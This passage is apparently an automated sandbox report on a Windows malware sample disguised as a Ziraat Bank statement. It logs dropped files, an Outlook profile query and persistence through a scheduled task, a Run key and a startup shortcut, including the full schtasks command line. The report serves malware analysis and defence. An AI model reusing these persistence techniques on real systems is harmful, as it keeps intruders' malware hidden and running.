                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: TrojanAIbot.exe.lnk.13.drLNK file: ..\..\..\..\..\ACCApi\TrojanAIbot.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdStatic file information: File size 1082267 > 1048576
                      Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055485949.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020A88000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2054000196.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020A75000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000007.00000003.2106786237.0000000005180000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000008.00000003.2111119072.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbH source: x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2054794048.0000000002B5F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055485949.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2111066376.0000000021E9F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2136598756.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2111066376.0000000021E70000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020A88000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2054000196.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020A75000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdb source: esentutl.exe, 00000007.00000003.2106786237.0000000005180000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdb source: esentutl.exe, 00000008.00000003.2111119072.0000000000B90000.00000004.00001000.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: Yara matchFile source: 4.2.x.exe.2d90000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.2055485949.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: lxsyrsiW.pif.4.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DA894C LoadLibraryW,GetProcAddress,FreeLibrary,4_2_02DA894C
                      Source: armsvc.exe.11.drStatic PE information: real checksum: 0x32318 should be: 0x149394
                      Source: neworigin.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x480db
                      Source: Wisrysxl.PIF.9.drStatic PE information: real checksum: 0x0 should be: 0x10a70e
                      Source: x.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x10a70e
                      Source: server_BTC.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x42478
                      Source: lxsyrsiW.pif.4.drStatic PE information: real checksum: 0x0 should be: 0x1768a
                      Source: TrojanAIbot.exe.13.drStatic PE information: real checksum: 0x0 should be: 0x42478
                      Source: alpha.pif.7.drStatic PE information: section name: .didat
                      Source: armsvc.exe.11.drStatic PE information: section name: .didat
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DBD2FC push 02DBD367h; ret 4_2_02DBD35F
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02D963B0 push 02D9640Bh; ret 4_2_02D96403
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02D963AE push 02D9640Bh; ret 4_2_02D96403
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02D9C349 push 8B02D9C1h; ret 4_2_02D9C34E
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DBC378 push 02DBC56Eh; ret 4_2_02DBC566
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02D9332C push eax; ret 4_2_02D93368
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DBD0AC push 02DBD125h; ret 4_2_02DBD11D
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DA306B push 02DA30B9h; ret 4_2_02DA30B1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DA306C push 02DA30B9h; ret 4_2_02DA30B1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DBD1F8 push 02DBD288h; ret 4_2_02DBD280
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DBD144 push 02DBD1ECh; ret 4_2_02DBD1E4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DAF108 push ecx; mov dword ptr [esp], edx4_2_02DAF10D
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02D96782 push 02D967C6h; ret 4_2_02D967BE
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02D96784 push 02D967C6h; ret 4_2_02D967BE
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02D9D5A0 push 02D9D5CCh; ret 4_2_02D9D5C4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DBC570 push 02DBC56Eh; ret 4_2_02DBC566
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02D9C56C push ecx; mov dword ptr [esp], edx4_2_02D9C571
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DA8AD8 push 02DA8B10h; ret 4_2_02DA8B08
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DAAAE0 push 02DAAB18h; ret 4_2_02DAAB10
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02D9CBEC push 02D9CD72h; ret 4_2_02D9CD6A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E04850 push eax; ret 4_2_02E04920
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DA886C push 02DA88AEh; ret 4_2_02DA88A6
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02D9C9DF push 02D9CD72h; ret 4_2_02D9CD6A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DA6948 push 02DA69F3h; ret 4_2_02DA69EB
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DA6946 push 02DA69F3h; ret 4_2_02DA69EB
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02D9C977 push 02D9CD72h; ret 4_2_02D9CD6A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DA790C push 02DA7989h; ret 4_2_02DA7981
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DA5E7C push ecx; mov dword ptr [esp], edx4_2_02DA5E7E
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DA2F60 push 02DA2FD6h; ret 4_2_02DA2FCE
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_02890C55 push edi; retf 12_2_02890C7A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_06B525A0 push FFFFFFC3h; ret 14_2_06B525D8

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Wisrysxl.PIFJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\lxsyrsiW.pifJump to dropped file
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile created: C:\Users\user\AppData\Local\Temp\neworigin.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Wisrysxl.PIFJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\lxsyrsiW.pifJump to dropped file
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile created: C:\Users\user\AppData\Local\Temp\server_BTC.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 09:33 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                      Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WisrysxlJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WisrysxlJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DAAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_02DAAB1C
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
